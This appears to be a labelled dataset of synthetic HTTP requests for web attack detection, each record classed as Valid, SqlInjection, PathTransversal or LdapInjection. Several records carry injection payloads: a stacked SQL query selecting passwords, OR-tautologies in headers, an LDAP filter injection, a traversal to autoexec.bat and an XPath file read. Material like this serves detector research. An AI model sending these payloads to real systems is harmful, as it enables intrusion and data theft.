~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 49593
Start - Id: 4611
class: Valid
PUT /YK5pcmdprocessing-instruction/l-1rY/ePhDsQ/script1YTWBY5DiZg1J/1egpm6rAsscrl/uthtn5sbonzA6opo/jh2haaeexyatthno/9IIOuXlMh6Gtl/5sE@d@uuQdkf.css? HTTP/1.0
Content-Length: 171
Content-Language: tmoI
Content-Encoding: compress
Content-Location: /plntoI4e/r2petrA/ssUs.wav
Content-MD5: bm5pNHJ2b3RtdWk1aGF4bQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 06 Apr 07 03:21:09 GMT
Last-Modified: Tue, 06 Jan 09 13:29:04 CET
Host: www.r0r3y5e4eE.biz
Connection: ysndene
Accept: */*
Accept-Charset: windows-1253;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 106.70.84.133
Cookie: buRYqsamKbj5=887095;eeeiyneitvsv=c0aPtin;hCJjxtermperlUvxNYn=rr:ni6tdv|cntcse
Cookie2: $Version="256"
Date: Tue, 08 Jul 08 17:59:48 UTC
ETag: "sg@ihNTuVOy75ZcaHms"
Expect: fiaan
From: acjzno@3gxnNel.fr
If-Modified-Since: Sun, 02 Jan 05 01:44:03 UTC
If-Unmodified-Since: Tue, 29 May 07 05:08:52 CET
If-Match: "8lgF-3pOBeXxM@GG"
If-None-Match: "tGZ5ZYZIj5FaN4Yc0aB"
If-Range: *
Max-Forwards: 2651
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: NTLM MnJUc2J1ZUlyMnR4czZ5YW90bGVoamtpaXNsRWYwcnNwbGg4cWUweUE=
Authorization: Digest algorithm=MD5-sess
Range: -0,-2986,-51980
Referer: http://www.tlLh.ch/orveTAe/prf3.bin
TE: trailers,deflate,deflate;q=0.1
Trailer: If-None-Match
User-Agent: Mozilla/0.1 (Machintosh; U; PPC Mac OS X 9.2; 84-nm; rv:9.1.2) Gecko/68762783
UA-CPU: Sparc
UA-Disp: 183,1102,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 022x3298
Via: HTTP/6.8 www.fTi8htE.html:319, HTTP/7.1 195.223.146.86
Transfer-Encoding: gzip
Upgrade: frylcn/4.6, st0tb/5.0, iRO/3.3
Warning: 848 215.17.207.198:27 "dhaswCc" "Tue, 17 Feb 09 02:45:11 CET"
X-Forwarded-For: 71.251.211.91
X-Serial-Number: 94988
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~

hyBbparL74evn=httmognrioth&eeati=newa7eetaauR8eeof&rg4hHv=0&taOm=5&lasnbleWxig17=<e&3LUxCCTZP8=stdinaenwinnt&btvwl=49&slbbegHf=\ee)&ewipfmtn=e1n&HVo=it5CTS&Tuuik=i1t

End - Id: 4611
Start - Id: 36154
class: PathTransversal
GET /smsgYeoPeuehi/50m61ZU7hoU8VkumjrbY/jbuul/oJ0zw/q94aanzd/LvAd0/ndd8u6oAB/szD.nsf?tesj=ra&e0ossogh9ksoes=%5Cautoexec.bat&tozgnnmciuray=js64R%5Cie&sahmtifle2MgdE=ibJxEn9Z&ghwindow.opencr=utEeQvoy7e%3Doa6nullfm&php=bTRPqocjLyZF&3qzwXT2oH6=3 HTTP/1.0
Host: www.jaoStteh.ch
Connection: keep-alive
Accept-Charset: windows-1254
Accept-Encoding: compress, deflate, compress;q=0.4, deflate;q=0.5
Date: Mon, 02 Oct 06 14:04:38 CET
If-Unmodified-Since: Tue, 05 Aug 08 05:18:17 CET
Authorization: Digest nonce
Referer: /snboiNh/rethepl/9heorlvF.nsf
User-Agent: Mozilla/2.4 (Windows; U; Windows NT 9.6; el-1a; rv:3.8.6) Gecko/79681657
UA-Color: color8
Transfer-Encoding: deflate
X-Forwarded-For: 126.138.228.99

null

End - Id: 36154
Start - Id: 10002
class: Valid
GET /ZP/R38-7/iY3l-YZWK/6GMdeletepFmNF5orKE4/agwIgcg.css?HLQ0YpIwPX=tges%5Drrtjsystyle+ei&F.faVnq6=e0dn2-noe9I&vdzmihcretec=e%3Dw&euRuafymfiSlsHx=o9fw3&xdfedsaueootHia=3&rst0V5td=bpnuiovariNy%29Wpm&sno=zrmOdelete3eI&ihniesicwea7=815163&kwofiD1n=onuwhereu1%7Eu&kFxp_Hbin=386&Aq8aRepstY=8104&kx0hjyjdef=ss4&3GkG=4110423 HTTP/1.0
Host: www.shohp9ls7.de
Connection: 4BPtt6
Accept: */*;q=0.7
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: emy-pInbv;q=0.9, slsaeeeo-a8tmq;q=0.9, thkeim-tdpc
Cache-Control: max-age=352
Client-ip: 154.195.78.141
Cookie: snmSnAo=linkee;uinput7WnullGv1y=2208637;bai70ondlt=988;raul=610602582
Cookie2: $Version="2"
Date: Fri, 13 Mar 09 02:33:49 GMT
ETag: "309pP6mElF0xbr1pH"
Expect: 7i65tfkh=nraxttr
From: 2rbOee@urmb.de
If-Modified-Since: Sun, 18 Jul 04 18:37:42 UTC
If-Unmodified-Since: Tue, 29 Mar 05 24:01:27 UTC
If-Match: *
If-None-Match: "wqghPCN_TCaoueGP3.O."
If-Range: *
Max-Forwards: 9919
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: NTLM N2k2YUpsbG5hbW9hcnJyZUJ1bm4zeWk5cml2YXNvbWFpaHRpNWNkZWRob2lU
Authorization: Digest opaque="tl3ni"
Range: 7-,1-2,575-73
Referer: /shbDEwfR/pdnisno.wav
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/5.2 (Machintosh; U; Mac OS X 5.2; bt-ml; rv:6.9.3) Gecko/51777739
UA-CPU: Sparc
UA-Disp: 0205,052,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 6267x971
Via: FTP/1.0 www.eogTdn.htm, lnotuh/5.5 www.bO0o.jpeg, dmad9t/5.3 58.13.196.221:48
Transfer-Encoding: gzip
Upgrade: b2bhql/3.8
Warning: 441 www.sNfaestc.html:841 "a3fh" 
X-Forwarded-For: 48.85.205.201
X-Serial-Number: 54263
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10002
Start - Id: 42119
class: SqlInjection
GET /Gexec0aZyUnodet/hU7oUXy_Z1/wxVYesB27vX0v9@/UEGyP/f01DfP2qt-cbw8bFH/t8gFLM3/ofcomrnkYecz4rarete.tiff?mn1aor4=ihmElG&teuiw8U4=ieeed&t422ChUh=%24O%7CtobjectlocationDnph-na&p7oenenenmlpoa=4a&hatrmd=a8NZlJ8wls-&UQ2m=%27%3B++++begin++declare++%40ret++varchar%288000%29++set+%40ret%3D%27%3A%27++++select++%40ret%3D%40ret%2B%27+++++%27%2BeIa%2B%27%2F%27%2Bpassword+++++from++++tpaion++++where+++++ehn%3E%40ret++++select+++%40ret++++as++++ret+++into++++foo+++++end--&5z--Ab=t%2Fhi&iv=pld%7CamotEea&itsed=oDL2Tr4WD4yu&Zxenupi1tney=114&iwihuqnaerEbnjo=51634133&s8ruidep=wVj43Cf0SOCb HTTP/1.0
Host: www.srsnntads.be
Connection: awlebhrH
Accept: */*
Accept-Charset: iso-8859-1, cp-932, koi8-r;q=0.5
Accept-Encoding: *;q=0.0
Accept-Language: srtcsudi-tcTyaobd, eqi-eee;q=0.8, ntelRYt3-n;q=0.5
Cache-Control: max-age=474
Client-ip: 209.54.39.204
Cookie: tnrt4yDh=2322283835;YmQ77netcathtpass=lNtetiadmql;mA4frqinelLtb=87;7tphod7yuc=iZTH9j7V;efaesfd=nm&tncopen4emwtl]aechoe?i
Cookie2: $Version="52"
Date: Thu, 11 Feb 10 01:24:50 GMT
ETag: "36ABV77V@jd_sdUj"
Expect: aeUss=7wjdte;uElxnLe
From: jqr1h@steT4irua.uk
If-Modified-Since: Wed, 26 Mar 08 20:31:22 UTC
If-Unmodified-Since: Sat, 14 Apr 07 05:19:04 CET
If-Match: *
If-None-Match: "1CYOhi3upGPrFe2R81bB"
If-Range: Sun, 14 Jun 09 17:42:16 UTC
Max-Forwards: 513
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: Basic ZXZ0b25hczpyd2VpZQ==
Authorization: Digest realm
Range: 80-3804,023297-91,09-
Referer: /2eeba5/sDrqat/A8sh.asp
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/0.0 (compatible; hrmtisk; Open BSD i386; wmbn)
UA-CPU: MIPS
UA-Disp: 7194,078,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 051x7587
Via: dto/9.8 www.nggan.jpeg:808, 1.1 164.60.70.204, 7.9 159.129.86.145
Transfer-Encoding: identity
Upgrade: rcbt/8.5, asrs/2.2, wsnl/5.1, trldRe/2.1
Warning: 310 236.101.41.30 "heS1" "Tue, 01 Aug 06 04:08:43 UTC"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 912151407
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42119
Start - Id: 17369
class: Valid
GET /ie3lttncf.tiff?cbesxehsl=adZTL83hvU&o3EnmEqumoau=s&stECi3diusp0nut=e4aWi&m9heh2iLiCseos=060209&ini=fd2tLOvoo8Acfn&qlrkAscTe=agno%262if-dtj&u-qm=2298&dsorutR=51&whX0osuvyee=7%3E%7EeeFo&iessfaqsro=12458379 HTTP/1.1
Host: www.eAe1gao.be
Connection: close
Accept: image/*, audio/x-wav, application/*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-age=600
Client-ip: 92.22.206.82
Cookie: 59wgetNYPqx=9;o6ciretv4alltnc=6061315193;no-KsLv@yr=r.4WnVjL;b9=)cnph-rePtmqexp_yosi;a7a= l2
Cookie2: $Version="423"
Date: Tue, 17 May 05 04:00:26 GMT
ETag: W/"rk6--nRQPChFU6E6sXd"
Expect: 100-continue
From: yyIsne@ooTpl.net
If-Modified-Since: Sat, 16 Jul 05 13:47:13 CET
If-Unmodified-Since: Mon, 09 Oct 06 09:16:37 UTC
If-Match: "pnkJ2SgX2S@By.t"
If-None-Match: *
If-Range: "_9YBEc0WV4okhUa-"
Max-Forwards: 79
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: ofdre 8Etxoxoo=kwnne
Authorization: Digest opaque="OonaH"
Range: 98234-2322,3589-76048,8-
Referer: /e6so.png
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.4 (Windows; U; WinNT 1.0; 2P-3t; rv:5.5.1) Gecko/62213635
UA-CPU: MIPS
UA-Disp: 436,9131,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 0771x1366
Via: 0.8 21.125.90.48, 3.6 www.ia7hol.css:557, 8.8 www.i0uYiOh.jpeg
Transfer-Encoding: deflate
Upgrade: haa/8.1, gak/0.7, earct/4.3
Warning: 636 www.eaenrt2.tiff "it4t" "Wed, 17 Nov 04 16:09:09 CET"
X-Forwarded-For: 81.255.22.153
X-Serial-Number: 57813396861
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17369
Start - Id: 37960
class: LdapInjection
GET /da_7woV9iL8GHBMB1/MGXrxH/goonnkmeayRenn/rput9et/ti3ewgdlacasaci58not.htm?annrsrda=6yreeixet3p&MlNBy0cBqf=n%3Ah&Tbsesi8Oanlsph=+ps&aot=Rosga%29%28%26%28objectClass+%3DgrOf*%29 HTTP/1.0
Host: 230.253.128.209
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: Ss2de-k4odf, of-eayfylT;q=0.2, ohat-atrhn;q=0.3, lthah1tg-osodso3g;q=0.0
Cache-Control: no-cache
Client-ip: 106.160.89.209
Cookie: yaabistglStt=jbN;jefQQGZnhg=na
Cookie2: $Version="12"
Date: Sun, 31 Jul 05 19:36:07 UTC
ETag: W/"AMXW7dHrAGf@J@P3v-"
Expect: psersns=esanan
From: ob6jr0@oucA7niAri.it
If-Modified-Since: Mon, 19 Jan 09 24:06:48 CET
If-Unmodified-Since: Wed, 10 Jan 07 19:47:15 GMT
If-Match: "qYAaSyMwG0SpfyL--W"
If-None-Match: "16GEyzl.qkhY@m5DfNc"
If-Range: "HHGLgH@t25Ogq-B"
Max-Forwards: 184
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: ndeT l2ftnt=toae
Range: 80461-
Referer: http://www.Sorvu.net/onsbof0m.shtml
TE: trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/8.7 (X11; U; Open BSD i586 8.4; ps-ud; rv:8.8.6) Gecko/19427812
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 8848x2681
Via: 3.4 227.238.161.80:3, 8.1 2.242.230.209
Transfer-Encoding: gzip
Upgrade: meng/6.1, eFlrhd/9.3, 8sNla/8.7
Warning: 700 www.fia1N.gif "guys2ngneaoLs2joonsi" "Fri, 30 Dec 05 15:06:31 CET"
X-Forwarded-For: 36.237.252.182
X-Serial-Number: 8812591
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37960
Start - Id: 44807
class: PathTransversal
GET /wD/ueeRarahta8d1E.pl?8Ot0a=ebaP%27&ggolgcntbato4=doc%28++file%3A%2F%2F%2Fc%3A%2FilNa%2Feonea.xml++%29&tla=upJg4s&PR=1nyohtlfk HTTP/1.1
Host: 87.4.145.53:80
Connection: Uaqwrf
Accept: audio/*, video/quicktime;q=0.0
Accept-Charset: *
Accept-Encoding: deflate, identity;q=0.5, gzip, deflate
Accept-Language: *
Cache-Control: Loo='at8se'
Client-ip: 162.199.90.42
Cookie: eqsc=8878;eEOFtbtefh8e=gyunionihttp winntuvnvtwosar;eksdb=eAwCtth%
Cookie2: $Version="8"
Date: Wed, 23 Mar 05 05:11:29 UTC
ETag: "5dTB3_gAXG5Nx4RIfSTO"
Expect: 3wznn
From: srwYoiR5@1klnww.fr
If-Modified-Since: Sun, 19 Dec 04 01:55:59 UTC
If-Unmodified-Since: Fri, 10 Feb 06 06:01:44 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 01 Oct 04 20:37:42 CET
Max-Forwards: 5
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: Basic ZWVlYmloMTpvYWxyb2Yx
Authorization: ikho9 ta2z=kpen
Range: -970
Referer: http://www.hIw3ar.ch/2yilei/et8aLm6/nfkr/d90mczo.mpg
TE: deflate,deflate;q=0.5,chunked;q=0.1
Trailer: Pragma
User-Agent: s0sran
UA-CPU: x86
UA-Disp: 5653,4264,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 5717x165
Via: jmfqSw/0.8 www.se5m.shtml, as8tA/7.0 67.111.156.254, 5.0 195.198.130.110
Transfer-Encoding: gzip
Upgrade: neacoe/5.1, 7qfTia/9.7, negety/9.4, hbiry/6.4
Warning: 444 49.226.175.61:095 "anooncjio" "Wed, 26 Jul 06 23:48:52 GMT"
X-Forwarded-For: 232.35.194.78
X-Serial-Number: 42053074878
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44807
Start - Id: 13539
class: Valid
GET /y1McMaETvUKYtF/u8a/metaW1sVUexecJ.ZfG9Zw/IPPtaccess_logB_mAtelnethtacces/a0FVp@mmMAEiycc7YM/TF/dc2irht4amubioisunr/hj8ihtpassqxml/qisea40he.jpg?nutoe6apmnee=xSA1vPvc4&iacp5ea52i78u=tyN&UW4t=1656765&oepDoju=x+2tood&aoosbcsklgu9iur=8ef2ThhAdhstpt7s&nnaw=e7wdiraOvtu&en7g5X4=028&lBkedasam3to=rNcm&sfimgobinWaIJDs=hE+eQO%25jme%40vd0ediscriptscript%3C&jzebinyhl=606&ee9UdjhnaewEch=oq&.node3bVmogZx0a=+rm9nc HTTP/1.1
Host: 121.116.185.198
Connection: Det6
Accept: application/zip, image/jpeg;q=0.3, text/*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: lis5tih-toh;q=0.4
Cache-Control: max-stale=20
Client-ip: 245.119.144.101
Cookie: tairfhXet=narotlhexeccNird
Cookie2: $Version="3"
Date: Mon, 24 Aug 09 16:26:23 UTC
ETag: W/"53VGOjanPVzk-smME0mO"
Expect: 100-continue
From: Fcme7o@nouae.be
If-Modified-Since: Thu, 23 Jun 05 09:19:13 UTC
If-Unmodified-Since: Fri, 09 Apr 04 12:04:08 CET
If-Match: "U7cCOsCvrbqw_OJIR3qR"
If-None-Match: "dwxa@8Rz.zRAu4jx"
If-Range: *
Max-Forwards: 7
MIME-Version: 9.1
Pragma: heso='urot'
Proxy-Authorization: easre atnA=isiejuv
Authorization: NTLM dXNvb2pTYXZFaWRycGdpb3RUbm90YW5oaXR0YW95ZlNuZVpnaGFzbDhhdg==
Range: 99683-
Referer: http://www.turmmeS.gov/17Gcpw/Xgmn5es1/n7on/laieusrl/Jsdnh.pdf
TE: gzip;q=0.6,deflate,gzip;q=0.2
Trailer: If-Modified-Since
User-Agent: Mozilla/6.2 (Windows; U; Win98 1.6; cn-oa; rv:8.1.2) Gecko/40431758
UA-CPU: PowerPC
UA-Disp: 1899,114,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 1988x830
Via: FTP/0.2 www.4tqe8d.shtml, 3.7 198.133.126.95:3, 7.4 165.183.11.46
Transfer-Encoding: compress
Upgrade: nw9n67/1.2
Warning: 556 www.oeriie.jpg:88588 "wf9nr6Oa" 
X-Forwarded-For: 156.12.70.0
X-Serial-Number: 47214022934711888870
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13539
Start - Id: 41215
class: SqlInjection
GET /nfzhavingnetcatt/dDvdtAJya.w4-FPk/htpasszy/rYh5kSYDPmERq.jsp?5ilfanwt=8iuselectCidwwflai5can0a&xRyn9rSI=ptnn+reeerpl&TJHcopyXNNl5rcp=oaceeeewtemos&hrdetoiO6eh=ntjntlhfsyAws7&snfnhehee=sqe HTTP/1.0
Host: www.bryreeo.be
Connection: keep-alive
Accept: text/*;q=0.4, video/*;q=0.3
Accept-Charset: iso-8859-8-i;q=0.4, utf-7;q=0.1, utf-8;q=0.6
Accept-Encoding: *;q=0.4
Accept-Language: ' /**/  OR   /**/''    =  '
Cache-Control: t='zhuhav5'
Client-ip: 107.193.63.164
Cookie: xleEalitrnoon=5106505
Cookie2: $Version="8"
Date: Tue, 10 Apr 07 16:53:30 GMT
ETag: "kcg5S6EEaHytpwVyC3N"
Expect: 100-continue
From: ljOoeae@dayLl.cz
If-Modified-Since: Mon, 20 Jul 09 09:07:43 CET
If-Unmodified-Since: Mon, 03 Mar 08 07:24:34 GMT
If-Match: "7LzWO_FYegPqugP"
If-None-Match: *
If-Range: Thu, 20 Jul 06 16:18:30 GMT
Max-Forwards: 1713
MIME-Version: 5.2
Pragma: curht=vek
Proxy-Authorization: Digest username="sctgYp"
Authorization: prns5s reiAh=juarld
Range: 870-,33722-,80-34
Referer: http://www.aess.it/tapUm/eens/v5olchhe.cgi
TE: deflate;q=0.1
Trailer: Cache-Control
User-Agent: Mozilla/9.8 (compatible; hun9Uubn; Win 9x; irr0npi; eue3; rnxe8o)
UA-CPU: MIPS
UA-Disp: 1760,871,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 9140x4441
Via: 3.5 209.225.147.148
Transfer-Encoding: identity
Upgrade: sdrona/5.0, vtfpom/3.2, guE/8.0
Warning: 096 28.130.214.30:40463 "bwtv1" "Wed, 03 May 06 17:00:25 UTC"
X-Forwarded-For: 253.197.44.195
X-Serial-Number: 9505530425947859
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41215
Start - Id: 25289
class: Valid
GET /sgmwedenbudddt/8dwUSA/kBrw7z_/s2m/replaceriNKEhXtK@.jsp?euettafFaHs=uwal&8hhrtgsidEauf6=nfbuo&akhylzves=300497&vezDSslemrh=elrnrahf3alo3d09e&whereJpPV74nx.=327&uh01eTnhtdO=shrratqt1T%3Cesa%40mocha&GSiphp8=rirO7haog&d4ftds3eeffa=omaEdqboot.inicdh&pi8esdaa=cly&fa1o=mexecni&IhqrEaouct5oA=%2Ba&itmenViwhrmaa7d=58600&e9bhew=ahu%3DgEAfanee9en&ager=P%5CIl&9mqQ=bineero HTTP/1.1
Host: www.srrth0aoA.be
Connection: oznCemm
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.7, identity, identity;q=0.3, identity, identity;q=0.7
Accept-Language: mbm93T-ld;q=0.6, tutnr-luener, o0wmeph-rm, otionen-n;q=0.3, f0frr-28ni
Cache-Control: no-cache
Client-ip: 103.126.32.237
Cookie: 7cioTshrrtseahw=b (8@;epsnesji=bnrledneex;irY3dnonottt4=saTrce
Cookie2: $Version="74"
Date: Tue, 06 Jun 06 09:22:18 CET
ETag: W/"EKHxEwOdhj_m9BC"
Expect: 100-continue
From: tgej@l4Mpeyut.cz
If-Modified-Since: Sat, 24 Apr 04 13:23:03 GMT
If-Unmodified-Since: Sun, 26 Mar 06 05:14:52 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 22 Dec 04 04:09:05 CET
Max-Forwards: 89
MIME-Version: 9.9
Pragma: efdofrt3=kio2
Proxy-Authorization: iDor bidltu6W=esnn
Authorization: iawse nntopa=sDjjar
Range: 14-8536,5-5795
Referer: http://www.pn6eeps.cz/emhoiedG/ayhnr/nhxua.mspx
TE: trailers
Trailer: Accept
User-Agent: alsaresb
UA-CPU: Sparc
UA-Disp: 8204,1865,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 9336x783
Via: 6.0 128.235.105.106, ersn/1.7 www.eaedelfh.html, yqR2k7/3.1 113.170.48.75
Transfer-Encoding: deflate
Upgrade: eeatdB/9.3, ledwr/7.1, aho/6.1, tyrUls/5.5, Nr2gre/4.2
Warning: 776 www.rdYxT.js:39275 "ktn2Rsp3eeodnxlt1dmc" "Sat, 28 Jun 08 20:23:50 UTC"
X-Forwarded-For: 249.207.205.242
X-Serial-Number: 139373036597408522
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25289
Start - Id: 3795
class: Valid
GET /a6replacekBT4pvNJZe/tuoer7uetn6fs/srnme/bbFoExiL_lG/rcfP6TB6_TCbVQYs/v7VrkQTVgjAp/nqdWF/e.WX-yvAQFd0j4FX.JO.exe? HTTP/1.0
Host: 46.77.149.76
Connection: sntEl
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: gzip, gzip, compress;q=0.6, identity
Accept-Language: piod-inl;q=0.1
Cache-Control: max-stale=7
Client-ip: 167.249.170.167
Cookie: 6Mq7=haasExosgt3lh;eahsI3tjEoshnea=960793;flsb6mhg=wQ.o6GHC5mIZ;2suPtid6aBs=mw2-zFHyiO2N;mrtxogrsSefet=tdetgte7ergmif0d
Cookie2: $Version="3"
Date: Thu, 12 Aug 04 15:12:47 UTC
ETag: W/"t44np7sEzHj.Lvu.1Aw"
Expect: 100-continue
From: tehobsel@tm6erf.gov
If-Modified-Since: Tue, 07 Dec 04 11:07:05 UTC
If-Unmodified-Since: Wed, 06 Aug 08 24:58:47 UTC
If-Match: "7Y@.Ev8DvBp3rrld"
If-None-Match: *
If-Range: *
Max-Forwards: 89
MIME-Version: 8.0
Pragma: A=v
Proxy-Authorization: Basic alRxcTpsdWVy
Authorization: NTLM cmRtbG5oc2xvcjZjbGlhZWVjZm5sYUltbWl3Znd3bU50aWhobndUc3R1ZU5iag==
Range: 1-,-5,1-17584
Referer: http://www.xdkBt.be/3benrieb.jpeg
TE: gzip,deflate;q=0.4,trailers
Trailer: If-Match
User-Agent: fDc6rlsht/7.9
UA-CPU: PowerPC
UA-Disp: 366,5440,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 0475x7705
Via: hemee/2.4 www.tiaeadn.shtml, 9.4 www.2ofur.gif:4, 9.6 58.2.214.127
Transfer-Encoding: deflate
Upgrade: ae6/0.7, dwb/4.2, ltsri/6.3, aNt/0.1, 4t3eGn/0.0
Warning: 518 www.eueeyr.jpeg "tgssmnnype2ohbn" "Mon, 16 Mar 09 02:19:12 UTC"
X-Forwarded-For: 163.248.155.118
X-Serial-Number: 78721162564928909210
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3795
Start - Id: 42699
class: SqlInjection
PUT /a5nuu5D/XkBvMXcoHBF2/dX/iQTwPYNBa@Ugv0y-/eoD@jt8Ptqi.php4? HTTP/1.1
Content-Length: 13
Content-Language: te8
Content-Encoding: gzip
Content-Location: /trlyBg/teEbhaoe/0eehnsbx.conf
Content-MD5: bHE0N3VzdGRsZmFuYXMyaA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 14 Oct 06 21:52:47 GMT
Last-Modified: Fri, 11 Mar 05 10:08:03 GMT
Host: www.atotite.fr:88
Connection: close
Accept: image/jpeg;q=0.3, application/x-tar;q=0.6, text/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: qwer'   or   atk_v.Account='Bhv1od0@fstip.com
Cache-Control: no-transform
Client-ip: 94.0.86.93
Cookie: ao9apDrtope7ha=o.Y;edk=tarEJeA;xhfg=6536;iNaruiilm=haheed
Cookie2: $Version="484"
Date: Thu, 26 Nov 09 12:48:53 CET
ETag: W/"gRLiLB5wRoWQbJgzKPp"
Expect: 100-continue
From: neeio@ame9cqfri.it
If-Modified-Since: Tue, 25 Oct 05 24:54:29 UTC
If-Unmodified-Since: Mon, 27 Mar 06 04:30:01 GMT
If-Match: "r48sTpot7jzgBtUn9-G"
If-None-Match: *
If-Range: "3jWM@b6bqZ8asOM"
Max-Forwards: 50
MIME-Version: 4.7
Pragma: eso4nN=pne
Proxy-Authorization: Digest opaque="bii1e"
Authorization: Digest uri=/Hrsa/2au7mtno/e3n9ti/aDhtrszp/airx.nsf
Range: -04,546226-,740980-
Referer: http://eslGs.fr/ndemzeb/nvna/w1zne.php4
TE: trailers,chunked;q=0.4
Trailer: Connection
User-Agent: BefIemj/0.5
UA-Disp: 179,0813,8
UA-OS: Windows 98
UA-Color: color16
Via: HTTP/1.3 www.dhmkn.shtml, 6.3 www.raopdi.htm
Transfer-Encoding: compress
Upgrade: yhsa/7.0, ltu/5.5, 8is/5.2, litm/1.8
Warning: 078 www.z47d5rts.png "dAdqeaztTcow" 
X-Forwarded-For: 29.202.205.12
X-Serial-Number: 0088484140288112965
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cc0yrqdac=)

End - Id: 42699
Start - Id: 17451
class: Valid
GET /d@ZN0Ge5hVW7zfa/mgddLlEnc2n/W5QfukaE/hoaueadoabu9otrt/ra3/AU53Ma/eEy/rdjSOyx2/YO_.asp?aras4e0r=4&fephass5hy2=9rexec+&seXeIdpuxrggtn=k%5DT%25e&qTprocessing-instructionAIwget5Pautoexec0xO=E7&gepo5p=firC1&jEmetamD=2207093&tdI=h+ne&OTbfI=dl2net4nlnkLdjWhy&r3anpOeh7cenr=eIi+etzea%3Ed&odu0t=5&tdov=tideletewuo%3E&ZODTtQyIxtermCAX=%3EsilmU&tb=17730&8JABkH@=4 HTTP/1.1
Host: www.G3sqFeia.net
Connection: fsseA
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: deflate;q=0.7
Accept-Language: *
Cache-Control: no-transform
Client-ip: 141.4.227.36
Cookie: rYbtttpRrrpAgsi=gDwe3otksc;erdpetao=$rcpoha;oe9tthsaNeaufi=377;eoaTdDdfsaa=rselect;tetao3e=h5 un;bkS8FHvLBtf=aE=$d
Cookie2: $Version="744"
Date: Sun, 05 Aug 07 11:38:55 CET
ETag: W/"jyVMGH5q0Z2w9gdZWF"
Expect: eeOjeim=shOr;el0lberd=Lrnleij
From: 6osilt@7iEee.st
If-Modified-Since: Wed, 04 Apr 07 17:47:16 UTC
If-Unmodified-Since: Tue, 22 Feb 05 18:17:17 GMT
If-Match: *
If-None-Match: "t7lMfbCtxG07YP26ySBl"
If-Range: *
Max-Forwards: 9696
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: NTLM RXNzaXR0aWFpZXpycmVkZHdvMGtJZGxpZWhoZW9nb3QzMWFidHRiZXJhYUxuaGc=
Authorization: anTwc rsspte6y=5Njsh
Range: 676-
Referer: /rk1tem4.swf
TE: trailers,gzip
Trailer: Authorization
User-Agent: d1SVm@ http://www.firMe.org
UA-CPU: MIPS
UA-Disp: 779,0995,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 211x6880
Via: HTTP/7.9 www.athdeec.gif
Transfer-Encoding: ecizq
Upgrade: aAc/1.9, ntnoe/0.6, faiehi/4.5, ttsl/3.1
Warning: 211 109.34.244.12 "yezUa83tnoebkfw" 
X-Forwarded-For: 29.239.233.138
X-Serial-Number: 52284057
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17451
Start - Id: 20703
class: Valid
GET /LTE9cIjFZbARA/sifrireeeheeoa/tcajminuUsohoi/scowMr/pJBuN/hrsa1OishwnyseoenhbM/TrencvcgaasitIer52b8.jpg? HTTP/1.0
Host: 92.86.6.203:5751
Connection: CsrsEyto
Accept: */*;q=0.7
Accept-Charset: utf-7, iso-8859-7
Accept-Encoding: *
Accept-Language: hrf-tnienwnE, mleeames-eawnzps;q=0.6, anlkmwr-t, hr2oen-HlH;q=0.9, orn-ahsoae;q=0.8
